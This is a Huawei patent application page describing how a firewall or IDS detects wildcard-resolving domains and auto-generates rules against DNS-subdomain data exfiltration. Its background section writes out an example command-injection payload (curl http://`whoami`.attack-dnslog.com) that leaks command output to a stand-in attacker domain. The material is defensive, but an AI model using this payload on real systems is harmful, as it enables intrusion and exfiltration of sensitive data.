CN116865983A - 攻击检测方法和网络安全装置 - Google Patents

攻击检测方法和网络安全装置 Download PDF

Info

Publication number
CN116865983A
CN116865983A CN202210313324.5A CN202210313324A CN116865983A CN 116865983 A CN116865983 A CN 116865983A CN 202210313324 A CN202210313324 A CN 202210313324A CN 116865983 A CN116865983 A CN 116865983A
Authority
CN
China
Prior art keywords
domain name
sub
request
network security
security device
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202210313324.5A
Other languages
English (en)
Inventor
杨利东
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Huawei Technologies Co Ltd
Original Assignee
Huawei Technologies Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Huawei Technologies Co Ltd filed Critical Huawei Technologies Co Ltd
Priority to CN202210313324.5A priority Critical patent/CN116865983A/zh
Publication of CN116865983A publication Critical patent/CN116865983A/zh
Pending legal-status Critical Current

Links

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1425Traffic logging, e.g. anomaly detection
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416Event detection, e.g. attack signature detection
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1433Vulnerability analysis
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/20Network architectures or network communication protocols for network security for managing network security; network security policies in general
    • H04L63/205Network architectures or network communication protocols for network security for managing network security; network security policies in general involving negotiation or determination of the one or more network security mechanisms to be used, e.g. by negotiation between the client and the server or between peers or by selection according to the capabilities of the entities involved

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

本申请实施例公开了一种攻击检测方法和网络安全装置,用于生成检测规则。本申请实施例方法包括:网络安全装置截获第一域名请求,并基于所述第一域名请求获取目标域名,所述目标域名为所述第一域名请求中携带的域名的父域名;所述网络安全装置获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址,所述第一子域名与所述第二子域名不同;若所述第一IP地址与所述第二IP地址相同,则所述网络安全装置生成检测规则,所述检测规则的匹配条件中包括所述目标域名,所述检测规则用于检测基于所述目标域名实施的攻击。该方法可以减少由于人工收集及编写检测规则带来的检测成本。

Description

攻击检测方法和网络安全装置
技术领域
本申请涉及计算机技术领域,尤其涉及一种攻击检测方法和网络安全装置。
背景技术
域名泛解析技术是在域名前添加任何子域名,均可访问到域名所指向的地址的技术。由于泛解析技术的存在,攻击者可以通过操纵子域名信息,将敏感信息传递至外部区域。
当前技术情况下,网络安全装置例如入侵防御系统(intrusion preventionsystem,IPS)、入侵检测系统(intrusion detection system,IDS)或防火墙等通过设置检测规则实现对通过子域名传递信息的攻击检测。例如若攻击者控制attack-dnslog域服务器,attack-dnslog域服务器提供的域名为*.attack-dnslog.com,需要网络安全装置针对attack-dnslog.com新建一条检测规则,才能够检测基于该域名实施的攻击。
由于网络安全装置中预设的检测规则需要依赖人工收集及编写,成本较高。
发明内容
本申请提供了一种攻击检测方法,通过主动发起域名查询判断域名是否开启泛解析功能,从而生成对应的检测规则,可以降低检测成本。
本申请的第一方面提供了一种攻击检测方法,包括:网络安全装置截获第一域名请求,并基于所述第一域名请求获取目标域名,所述目标域名为所述第一域名请求中携带的域名的父域名;所述网络安全装置获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址,所述第一子域名与所述第二子域名不同;若所述第一IP地址与所述第二IP地址相同,则所述网络安全装置生成检测规则,所述检测规则的匹配条件中包括所述目标域名,所述检测规则用于检测基于所述目标域名实施的攻击。
本申请提供了一种攻击检测方法,网络安全装置根据第一域名请求中获取第一域名的父域名即目标域名,通过比较目标域名的两个子域名对应的IP地址相同确定目标域名开启了泛解析功能,因此网络安全装置针对该目标域名自动生成检测规则,由此可以实现对目标域名通过子域名传递信息的攻击检测,还可以减少由于人工收集及编写检测规则带来的检测成本。
在第一方面的一种可能的实现方式中,所述网络安全装置获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址之前,所述方法还包括:所述网络安全装置根据所述目标域名生成所述第一子域名和所述第二子域名;所述网络安全装置向域名服务器发送第二域名请求,所述第二域名请求中携带所述第一子域名;所述网络安全装置接收所述域名服务器返回的所述第二域名请求的响应消息,所述第二域名请求的响应消息中携带所述第一IP地址;所述网络安全装置向域名服务器发送第三域名请求,所述第三域名请求中携带所述第二子域名;所述网络安全装置接收所述域名服务器返回的所述第三域名请求的响应消息,所述第三域名请求的响应消息中携带所述第二IP地址。
本申请提供的攻击检测方法,提供了获取两个不同的子域名的一种具体实现方式。
在第一方面的一种可能的实现方式中,所述网络安全装置获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址,包括:所述网络安全装置从所述第二域名请求的响应消息中获取所述第一IP地址;以及所述网络安全装置从所述第三域名请求的响应消息中获取所述第二IP地址。
本申请提供的攻击检测方法,提供了判断目标域名是否开启泛解析功能的一种具体实现方式,即通过生成两个不同的子域名,分别向域名服务器获取两个子域名对应的IP地址,比较两个IP地址是否一致。
在第一方面的一种可能的实现方式中,所述网络安全装置根据所述目标域名生成所述第一子域名和所述第二子域名,包括:所述网络安全装置将所述第一域名请求中携带的域名中的全部或部分输入第一预定算法,根据所述第一预定算法的输出生成所述第一子域名;所述网络安全装置将所述第一域名请求中携带的域名中的全部或部分输入第二预定算法,根据所述第二预定算法的输出生成所述第二子域名。
本申请提供的攻击检测方法,提供了生成两个子域名的具体实现方式,可选地,第一预定算法包括加密算法或编码算法,第二预定算法包括加密算法或编码算法。可选地,输入第一预设算法或第二预设算法的输入数据相同,基于不同的第一预定算法与第二预定算法,获取不同的第一子域名和第二子域名;可选地,第一预定算法和第二预定算法相同,网络安全装置可选取第一域名请求中携带的域名中的不同部分分别作为输入,以获取不同的第一子域名和第二子域名。本实现方式提供了生成两个不同的子域名的具体实现方式。
在第一方面的一种可能的实现方式中,所述第一子域名是所述第一域名请求中携带的域名,所述网络安全装置获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址之前,所述方法还包括:所述网络安全装置根据所述目标域名生成所述第二子域名;所述网络安全装置向域名服务器转发所述第一域名请求;所述网络安全装置接收所述第一域名请求的响应消息,所述第一域名请求的响应消息中携带所述第一IP地址;所述网络安全装置向域名服务器发送第四域名请求,所述第四域名请求中携带所述第二子域名;所述网络安全装置接收所述域名服务器返回的所述第四域名请求的响应消息,所述第四域名请求的响应消息中携带所述第二IP地址。
本申请提供的攻击检测方法,提供了获取两个不同的子域名的另一种具体实现方式。
在第一方面的一种可能的实现方式中,所述网络安全装置获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址,包括:所述网络安全装置从所述第一域名请求的响应消息中获取所述第一IP地址;所述网络安全装置从所述第四域名请求的响应消息中获取所述第二IP地址。
本申请提供的攻击检测方法,提供了判断目标域名是否开启泛解析功能的一种具体实现方式,即通过生成一个与第一域名请求对应的域名不同的第二子域名,向域名服务器获取第二子域名对应的第二IP地址,比较第一IP地址和第二IP地址是否一致。
在第一方面的一种可能的实现方式中,所述网络安全装置根据所述目标域名生成所述第二子域名,包括:所述网络安全装置将所述第一域名请求中携带的域名中的全部或部分输入第三预定算法,根据所述第三预定算法的输出生成所述第二子域名。
本申请提供的攻击检测方法,提供了生成第二子域名的具体实现方式。
在第一方面的一种可能的实现方式中,所述第三预定算法包括加密算法或编码算法,所述网络安全装置将所述第一域名请求中携带的域名中的全部或部分输入第三预定算法,根据所述第三预定算法的输出生成所述第二子域名,包括:所述网络安全装置将所述第一域名请求中携带的域名中的全部或部分输入所述第三预定算法,获取所述第三预定算法输出的字符串;将所述字符串与所述目标域名进行组合,生成所述第二子域名。
本申请提供的攻击检测方法,生成第二子域名具体可以通过将所述第一域名请求中携带的域名中的全部或部分输入所述第三预定算法,获取所述第三预定算法输出的字符串,然后将所述字符串与所述目标域名进行组合得到。
在第一方面的一种可能的实现方式中,所述域名服务器包括:公共域名服务器或预设的威胁域名服务器。
本申请提供的攻击检测方法,获取域名对应的IP地址时,请求的域名服务器,包括一个或多个可以提供DNS查询的服务器,域名服务器的种类包括:各类公共DNS服务器,例如根域名服务器、“.com”顶级域名服务器、一级域名服务器或二级域名服务器等;本地DNS服务器,例如存储有危险域名及对应IP地址的威胁域名库服务器等。
在第一方面的一种可能的实现方式中,所述网络安全装置预设域名白名单;所述网络安全装置生成检测规则之前,所述方法还包括:确定所述目标域名不属于所述域名白名单。
本申请提供的攻击检测方法,考虑到网络安全装置性能,避免资源占用或误告警,网络安全装置可预设域名白名单,对域名请求进行筛选,仅对不属于域名白名单中的域名,采用本申请提供的方法进行攻击检测。
在第一方面的一种可能的实现方式中,所述检测规则中的动作包括:生成攻击告警,所述攻击告警用于指示发生基于所述目标域名实施的攻击。
本申请提供的攻击检测方法,网络安全装置生成的检测规则中的动作包括生成攻击告警。
本申请的第二方面提供了一种网络安全装置,包括:获取模块,用于截获第一域名请求,并基于所述第一域名请求获取目标域名,所述目标域名为所述第一域名请求中携带的域名的父域名;所述获取模块还用于,获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址,所述第一子域名与所述第二子域名不同;处理模块,若所述第一IP地址与所述第二IP地址相同,则用于生成检测规则,所述检测规则的匹配条件中包括所述目标域名,所述检测规则用于检测基于所述目标域名实施的攻击。
在第二方面的一种可能的实现方式中,所述装置还包括:所述获取模块,还用于在获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址之前,根据所述目标域名生成所述第一子域名和所述第二子域名;所述装置还包括:收发模块,用于向域名服务器发送第二域名请求,所述第二域名请求中携带所述第一子域名;所述收发模块,还用于接收所述域名服务器返回的所述第二域名请求的响应消息,所述第二域名请求的响应消息中携带所述第一IP地址;所述收发模块,还用于向域名服务器发送第三域名请求,所述第三域名请求中携带所述第二子域名;所述收发模块,还用于接收所述域名服务器返回的所述第三域名请求的响应消息,所述第三域名请求的响应消息中携带所述第二IP地址。
在第二方面的一种可能的实现方式中,所述获取单元,具体用于:从所述第二域名请求的响应消息中获取所述第一IP地址;以及,从所述第三域名请求的响应消息中获取所述第二IP地址。
在第二方面的一种可能的实现方式中,所述获取模块,具体用于:将所述第一域名请求中携带的域名中的全部或部分输入第一预定算法,根据所述第一预定算法的输出生成所述第一子域名;将所述第一域名请求中携带的域名中的全部或部分输入第二预定算法,根据所述第二预定算法的输出生成所述第二子域名。
在第二方面的一种可能的实现方式中,所述第一子域名是所述第一域名请求中携带的域名,所述装置还包括:获取模块,用于在获取所述目标域名的第一子域名对应的第一IP地址,以及所述目标域名的第二子域名对应的第二IP地址之前,根据所述目标域名生成所述第二子域名;收发模块,用于向域名服务器转发所述第一域名请求;所述收发模块,还用于接收所述第一域名请求的响应消息,所述第一域名请求的响应消息中携带所述第一IP地址;所述收发模块,还用于向域名服务器发送第四域名请求,所述第四域名请求中携带所述第二子域名;所述收发模块,还用于接收所述域名服务器返回的所述第四域名请求的响应消息,所述第四域名请求的响应消息中携带所述第二IP地址。
在第二方面的一种可能的实现方式中,所述获取模块,具体用于:从所述第一域名请求的响应消息中获取所述第一IP地址;从所述第四域名请求的响应消息中获取所述第二IP地址。
在第二方面的一种可能的实现方式中,所述获取模块,具体用于:将所述第一域名请求中携带的域名中的全部或部分输入第三预定算法,根据所述第三预定算法的输出生成所述第二子域名。
在第二方面的一种可能的实现方式中,所述第三预定算法包括加密算法或编码算法,所述获取模块,具体用于:将所述第一域名请求中携带的域名中的全部或部分输入所述第三预定算法,获取所述第三预定算法输出的字符串;将所述字符串与所述目标域名进行组合,生成所述第二子域名。
在第二方面的一种可能的实现方式中,所述域名服务器包括:公共域名服务器或预设的威胁域名服务器。
在第二方面的一种可能的实现方式中,所述网络安全装置预设域名白名单;所述装置还包括:确定模块,用于在生成检测规则之前,确定所述目标域名不属于所述域名白名单。
在第二方面的一种可能的实现方式中,所述检测规则中的动作包括:生成攻击告警,所述攻击告警用于指示发生基于所述目标域名实施的攻击。
本申请第三方面提供了一种网络安全装置,包括:存储器,所述存储器中存储有计算机可读指令;与所述存储器相连的处理器,所述计算机可读指令被所述处理器执行时,使得所述网络设备执行如上述第一方面以及各种可能的实现方式中任一项所述的方法。
本申请第四方面提供了一种包含指令的计算机程序产品,其特征在于,当其在计算机上运行时,使得所述计算机执行如上述第一方面以及各种可能的实现方式中任一项所述的方法。
本申请第五方面提供了一种计算机可读存储介质,包括指令,其特征在于,当所述指令在计算机上运行时,使得计算机执行如上述第一方面以及各种可能的实现方式中任一项所述的方法。
本申请第六方面提供了一种芯片,包括处理器。处理器用于读取并执行存储器中存储的计算机程序,以执行上述任一方面任意可能的实现方式中的方法。可选地,该芯片该包括存储器,该存储器与该处理器通过电路或电线与存储器连接。进一步可选地,该芯片还包括通信接口,处理器与该通信接口连接。通信接口用于接收需要处理的数据和/或信息,处理器从该通信接口获取该数据和/或信息,并对该数据和/或信息进行处理,并通过该通信接口输出处理结果。该通信接口可以是输入输出接口。
其中,第二方面、第三方面、第四方面、第五方面或第六方面以及其中任一种实现方式所带来的技术效果可参见第一方面中相应实现方式所带来的技术效果,此处不再赘述。
本申请提供的攻击检测方法,网络安全装置根据第一域名请求中获取第一域名的父域名即目标域名,通过比较目标域名的两个子域名对应的IP地址相同确定目标域名开启了泛解析功能,因此网络安全装置针对该目标域名自动生成检测规则,由此可以实现对目标域名通过子域名传递信息的攻击检测,还可以减少由于人工收集及编写检测规则带来的检测成本。
附图说明
图1为本申请实施例提供的攻击检测方法的一个应用场景示意图;
图2为一个典型的攻击流程的示例图;
图3为本申请实施例中攻击检测方法的一个实施例示意图;
图4为本申请实施例中攻击检测方法的另一个实施例示意图;
图5为本申请实施例中攻击检测方法的另一个实施例示意图;
图6为本申请实施例中网络安全装置的一个实施例示意图;
图7为本申请实施例中网络安全装置的另一个实施例示意图。
具体实施方式
本申请实施例提供了一种攻击检测方法,用于实现针对子域名传递信息攻击的精确检测,降低检测成本。
下面结合附图,对本申请的实施例进行描述,显然,所描述的实施例仅仅是本申请一部分的实施例,而不是全部的实施例。本领域普通技术人员可知,随着技术的发展和新场景的出现,本申请实施例提供的技术方案对于类似的技术问题,同样适用。
本申请的说明书和权利要求书及上述附图中的术语“第一”、“第二”等是用于区别类似的对象,而不必用于描述特定的顺序或先后次序。应该理解这样使用的数据在适当情况下可以互换,以便这里描述的实施例能够以除了在这里图示或描述的内容以外的顺序实施。此外,术语“包括”和“具有”以及他们的任何变形,意图在于覆盖不排他的包含,例如,包含了一系列步骤或模块的过程、方法、系统、产品或设备不必限于清楚地列出的那些步骤或模块,而是可包括没有清楚地列出的或对于这些过程、方法、产品或设备固有的其它步骤或模块。在本申请中出现的对步骤进行的命名或者编号,并不意味着必须按照命名或者编号所指示的时间/逻辑先后顺序执行方法流程中的步骤,已经命名或者编号的流程步骤可以根据要实现的技术目的变更执行次序,只要能达到相同或者相类似的技术效果即可。
为了便于理解,下面对本申请实施例涉及的部分技术术语进行简要介绍:
1、域名系统(domain name system,DNS)是互联网的一项服务。它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。当前,对于每一级域名长度的限制是63个字符,域名总长度则不能超过253个字符。
2、子域名(subdomain),或称子域,是在域名系统等级中更高一层域的域。比如,mail.example.com和calendar.example.com是example.com的两个子域名,而example.com则是顶级域.com的子域名。相应地,example.com为mail.example.com的父域名。
3、域名泛解析:在某域名前添加任何子域名,均可访问到该域名所指向的WEB地址。例如,对域名example.com之下所设的*.example.com全部,如mail.example.com和calendar.example.com等中任意一个的访问均指向域名example.com对应的IP地址。
4、入侵防御系统(intrusion prevention system,IPS),一种网络安全装置,可用于提供防病毒软件(antivirus programs)和防火墙(packet filter/applicationgateway)之外的补充保护。IPS能够监视网络或网络设备的网络资料传输行为,能够及时的中断、调整或隔离一些不正常或是具有伤害性的网络资料传输行为。
5、入侵检测系统(intrusion detection system,IDS)一种网络安全装置,用于对网络传输进行即时监视,在发现可疑传输时发出警报或者采取主动反应措施的网络安全装置。它与其他网络安全装置的不同之处在于,IDS是一种积极主动的安全防护技术。
下面对本申请实施例中攻击检测方法的应用场景架构进行介绍,请参阅图1,为本申请实施例中攻击检测方法的应用场景架构图。
请参阅图1,为本申请实施例提供的攻击检测方法的一个应用场景架构图。该应用场景架构包括:用户设备100,网络安全装置200,域名服务器300。
用户设备100与域名服务器300之间通过网络连接进行通信。网络安全装置200位于用户设备100与域名服务器300之间,用于为用户设备100提供安全防护,应对可能存在的攻击,网络安全装置200可以应用本申请实施例提供的攻击检测方法实现攻击检测。
需要说明的是,用户设备100包括各类可以向域名服务器300发起DNS请求的设备,包括终端设备,业务服务器等等,具体设备类型此处不做限定。网络安全装置200用于实现本申请中实施攻击检测方法,网络安全装置200包括IPS、IDS或防火墙等,具体设备类型此处不做限定。域名服务器300包括一个或多个可以提供DNS查询的服务器,包括:各类公共DNS服务器,例如根域名服务器、“.com”顶级域名服务器、一级域名服务器或二级域名服务器等;本地DNS服务器,例如存储有危险域名及对应IP地址的威胁域名库服务器等。对于域名服务器300的数量及具体类型本申请中不做限定。
通常重要或敏感网络中会严格限制网络流向,例如:不允许内网访问外网,严格限制内网向外网传递信息,在限制内向外访问过程中,对DNS协议通常不做强限制,导致DNS请求可以内向外流动。由于业务服务器存在漏洞,攻击者能控制其将重要信息放在子域名中发起DNS请求。图2示出了一个典型的攻击流程,其中,用户设备相当于图1所示的用户设备100,防火墙相当于图1所示的网络安全装置200,公共DNS服务器相当于图1所示的域名服务器300。该攻击流程包括步骤201-204。
201、攻击者通过防火墙向用户设备发起漏洞攻击。
攻击者通过防火墙向用户设备发起漏洞攻击,例如,一条攻击命令为:http://123.23.2.1/admin?command='curl"http://`whoami`.attack-dnslog.com"',攻击载荷为:curl http://`whoami`.attack-dnslog.com,该攻击载荷的含义是:使用Curl系统命令,向http://`whoami`.attack-dnslog.com发起HTTP请求,其中whoami为linux系统命令。该攻击命令使得用户设备发起HTTP请求:http://root.attack-dnslog.com。其中,attack-dnslog.com为攻击者控制的域名服务器。
202、用户设备发起DNS请求。
用户设备收到攻击者发起的请求后,会对请求内容进行解析,解析过程中会执行curl http://`whoami`.attack-dnslog.com代码,由于该请求属于HTTP请求,用户设备需要获取域名对应IP地址,因此会发起相应DNS请求,示例性的,产生root.attack-dnslog.com的DNS请求(其中,root为来自`whoami`执行结果,属于系统功能的一部分)。
203、防火墙向公共DNS服务器转发DNS请求。
root.attack-dnslog.com DNS请求经由防火墙发往公共DNS服务器,通过DNS递归解析,公共DNS服务器中查询未果。
204、攻击者服务器接收root.attack-dnslog.com请求记录时。
最终root.attack-dnslog.com解析请求会到达由攻击者控制的attack-dnslog.com域名服务器,攻击者获取到位于子域名中的信息,即攻击成功。
从上述攻击流程中可以得出,由于泛解析技术的存在,攻击者可以通过操纵子域名信息,将敏感信息传递至外部区域。当前技术情况下,网络安全装置通过设置检测规则实现对通过子域名传递信息的攻击检测,而预设的检测规则需要依赖人工收集及编写,成本较高。
有鉴于此,本申请实施例提供了一种攻击检测方法,通过实现一种基于网络安全装置监测域名是否开启泛解析功能,自动生成规则,最终实现针对子域名传递信息攻击精确检测,通过持续监控可保证低误报率,低成本检测目标,可提升网络安全装置价值。
请参阅图3,本申请实施例提出了一种攻击检测方法。所述方法可以应用于图1所示的场景中,其中,图3中的防火墙相当于图1所示的网络安全装置200,公共DNS服务器相当于图1所示的域名服务器300。该攻击检测方法包括步骤301至步骤303。
需要说明的是,在实际网络场景中会有大量DNS请求,考虑到网络安全装置性能,避免资源占用或误告警,网络安全装置可预设域名白名单,对域名请求进行筛选,对于属于域名白名单中的域名对应的域名请求,无需用本申请提供的方法进行攻击检测。域名白名单包括一些针对知名网站或因常规业务开启泛解析功能的域名,例如:baidu.com,qq.com等。
域名白名单的获取方式包括以下两种,本实施例中对于获取域名白名单的方式不做限定。
1.通过人工或自动搜集方式收集现网最常用的,最为普遍的域名生成知名域名库,作为域名白名单。域名白名单可通过键值对(key:value)形式存储,举例如下:key:*.baidu.com;value:white。
2.通过设备自学习自动生成白名单,考虑到攻击域名实际使用中出现的次数要远小于正常域名,设定阈值并监测一段时间内的DNS请求流量,统计域名出现次数,次数大于或等于阈值的域名则加入域名白名单。
本申请的攻击检测方法基于识别目标域名是否开启泛解析功能,确定目标域名是否为威胁域名,进而生成检测规则,具体实现过程如下:
301、网络安全装置截获第一域名请求,并基于第一域名请求获取目标域名。
网络安全装置为用户设备提供安全防护,用户设备发起的域名请求会经由网络安全装置发送至域名服务器,网络安全装置能截获所有经过本装置的域名请求。
网络安全装置截获第一域名请求,提取第一域名请求中携带的域名,将该域名的父域名作为目标域名。示例性的,若第一域名请求中携带的域名为root.attack-dnslog.com,则目标域名为attack-dnslog.com。
302、网络安全装置获取目标域名的第一子域名对应的第一IP地址,以及目标域名的第二子域名对应的第二IP地址。
网络安全装置根据目标域名的两个子域名对应的IP地址是否一致判断该目标域名是否开启泛解析功能。
网络安全装置需要获取目标域名的第一子域名对应的第一IP地址,以及目标域名的第二子域名对应的第二IP地址。
网络安全装置获取第一IP地址和第二IP地址的方法包括以下两种:
第一种可能的实现方式中,网络安全装置根据目标域名生成两个不同的子域名,分别是第一子域名和第二子域名,并向域名服务器发送第二域名请求和第三域名请求,其中,第二域名请求中携带第一子域名,第三域名请求中携带第二子域名,根据域名服务器返回的第二域名请求的响应消息获取第一IP地址,根据域名服务器返回的第三域名请求的响应消息获取第二IP地址。
需要说明的是,网络安全装置生成第一子域名和第二子域名的具体实现方式包括,将第一域名请求中携带的域名中的全部或部分输入第一预定算法,根据第一预定算法的输出生成第一子域名;将第一域名请求中携带的域名中的全部或部分输入第二预定算法,根据第二预定算法的输出生成第二子域名。
在本申请实施例中,“算法”是指一种映射方式,或者说是一种函数。算法的目的是将输入数据按照一种映射方式转换为输出数据,其中输入数据和输出数据不同。不同的输入数据往往会产生不同的输出数据。相同的输入数据输入不同的算法,将产生不同的输出数据。
可选地,第一预定算法包括加密算法或编码算法,第二预定算法包括加密算法或编码算法。第一预定算法和第二预定算法的具体类型此处不做限定。可以理解的是,为生成不同的第一子域名和第二子域名,可选地,输入第一预设算法或第二预设算法的输入数据相同,基于不同的第一预定算法与第二预定算法,获取不同的第一子域名和第二子域名;可选地,第一预定算法和第二预定算法相同,网络安全装置可选取第一域名请求中携带的域名中的不同部分分别作为输入,以获取不同的第一子域名和第二子域名。示例性地,抽取目标域名中指定位置的字符重组合作为输入,以目标域名为attack-dnslog.com为例,为生成第一子域名,以目标域名中第1,3,5位置的字符(即atc)作为预定算法的输入,为生成第二子域名,以目标域名第2,4,6位置的字符(即tak)输入预定算法的输入,基于预定算法的不同输出分别得到第一子域名和第二子域名。本实施例中,对于网络安全装置生成第一子域名和第二子域名的具体实现方式不做限定。
第二种可能的实现方式中,第一子域名为所述第一域名请求中携带的域名,网络安全装置接收第一域名请求的响应消息,第一域名请求的响应消息中携带第一子域名对应的IP地址,即第一IP地址;此外,网络安全装置根据目标域名生成第二子域名,网络安全装置发送第四域名请求,第四域名请求中携带该第二子域名。接收所述域名服务器返回的第四域名请求的响应消息,第四域名请求的响应消息中携带第二子域名对应的IP地址,即第二IP地址。
需要说明的是,在本实现方式中获取第二子域名的方法可参考上一实现方式中获取第一子域名或第二子域名的方法。具体地,获取第二子域名的方法包括,网络安全装置将第一域名请求中携带的域名中的全部或部分输入第三预定算法,根据第三预定算法的输出生成所述第二子域名。可选地,第三预定算法包括加密算法或编码算法。在一种可能的实现方式中,网络安全装置将第一域名请求中携带的域名中的全部或部分输入该第三预定算法,获取第三预定算法输出的字符串;将字符串与目标域名进行组合,生成第二子域名。
示例性地,第一域名请求中携带的域名为“root.attack-dnslog.com”,提取父域名“attack-dnslog.com”作为第三预定算法的输入,第三预定算法为哈希算法,获取第三预定算法的输出字符串:hash(attack-dnslog.com),与目标域名进行组合,得到第二子域名:hash(attack-dnslog.com).attack-dnslog.com。
可选地,在获取第一IP地址和第二IP地址之前,网络安全装置确定目标域名不属于域名白名单中的任意一个域名。
303、若第一IP地址与第二IP地址相同,则网络安全装置针对目标域名生成检测规则。
若步骤302中网络安全装置获取的第一IP地址和第二IP地址相同,则说明目标域名开启了泛解析功能,本申请中,网络安全装置将根据目标域名生成检测规则,用于检测基于该目标域名实施的攻击。检测规则包括匹配条件和动作两部分,具体地,该检测规则的匹配条件中包括目标域名。可选地,该检测规则中的动作包括:生成攻击告警,攻击告警用于指示发生基于该目标域名实施的攻击。
示例性地,假设attack-dnslog.com为开启泛解析功能的目标域名,针对该域名的检测规则为:http(attack-dnslog.com),该规则代表:若通过网络安全装置的HTTP请求中,包含attack-dnslog.com字符串,则生成报警。在另一种可能的实现方式中,检测规则可以仅针对目标域名的子域名,检测规则为:http(*.attack-dnslog.com),该规则代表:若通过网络安全装置的HTTP请求中,包含*.attack-dnslog.com字符串(其中,*为通配符),则生成报警。
可以理解的是,基于该检测规则,网络安全装置对于后续经过的基于目标域名的攻击可以检出,该攻击检测方法由网络安全装置基于主动的泛解析功能检测生成,不依赖人工编辑,实现对通过子域名传递信息的攻击检测,还可以减少由于人工收集及编写检测规则带来的检测成本。
考虑到网络安全装置获取第一IP地址和第二IP地址的具体实现方式不同,下面分别参考图4和图5对本申请实施例中一种攻击检测方法进行介绍。
图4介绍在一种可能的实现方式,第一子域名为所述第一域名请求中携带的域名,网络安全装置根据第一域名请求的响应消息获取第一子域名对应的IP地址,即第一IP地址;此外,网络安全装置根据目标域名生成第二子域名,并通过主动发起第四域名请求获取第二子域名对应的第二IP地址。
图5介绍在另一种可能的实现方式中,网络安全装置根据目标域名生成两个不同子域名,并分别向域名服务器发送域名请求,根据域名服务器返回的响应消息获取第一IP地址和第二IP地址。
请参阅图4,其中,图4中的业务服务器相当于图1所示的用户设备100,防火墙相当于图1所示的网络安全装置200,公共DNS服务器相当于图1所示的域名服务器300。该攻击检测方法包括步骤401-405。
401、攻击者向业务服务器发起攻击;
攻击者向用户设备发起漏洞攻击,该攻击通过防火墙达到业务服务器,使得用户设备发起HTTP请求,业务服务器需要获取该HTTP请求中域名对应的IP地址。
402、业务服务器发起第一域名请求;
业务服务器发起域名请求Query(1)以获取该HTTP请求中域名对应的IP地址,该域名请求Query(1)经由网络安全装置转发,发往公共DNS服务器。
防火墙可对经过防火墙的所有DNS请求流量进行检测。防火墙截获第一域名请求,提取第一域名请求对应的Query(1)域名,原始请求流量正常放行。
403、业务服务器获取第一域名请求的响应消息;
公共DNS服务器向业务服务器返回第一域名请求的响应消息,即Answer(1),该响应消息经由防火墙发送至业务服务器。防火墙记录Answer(1)中的IP(1)地址。示例性地:第一域名请求对应的域名为root.attack-dnslog.com,在第一域名请求的响应消息中,该域名对应的解析IP为:112.113.45.5。可选地,防火墙以【域名:IP地址】的形式存储数据:【root.attack-dnslog.com:112.113.45.5】。
404、防火墙发起第二域名请求;
在防火墙获取Query(1)域名之后,防火墙获取Query(1)域名的父域名,即目标域名(attack-dnslog.com),对目标域名进行子域名生成,例如,将目标域名输入预设算法:hash(attack-dnslog.com)计算,得到的字符串(36bf52c64713abd41f8083fcc70d4241)与目标域名(attack-dnslog.com)组合得到Query(2)子域名,这里预设算法除了hash算法,还可以使用其他加密算法或编码算法(如md5加密,ASE加密、base64编码等),主要的目的为生成唯一子域名,其实现形式不唯一。
示例性地,防火墙依据生成的子域名,主动向公共DNS服务器发起第二域名请求,Query(2):36bf52c64713abd41f8083fcc70d4241.attack-dnslog.com请求。
需要说明的是,步骤404与步骤403之间的执行顺序不做限定。
405、防火墙获取第二域名请求的响应消息;
防火墙获取第二域名请求的响应消息Answer(2),并记录返回的Answer(2)中的IP(2):112.113.45.5。
防火墙判断IP(1)和IP(2)是否一致;
若返回IP(2)地址与用户设备获得到的IP(1)地址一致,则认为域名开启泛解析功能,例如:36bf52c64713abd41f8083fcc70d4241.attack-dnslog.com解析IP与root.attack-dnslog.com解析IP一致,均为112.113.45.5。
防火墙根据检出的泛解析域名,自动生成对应检测规则。
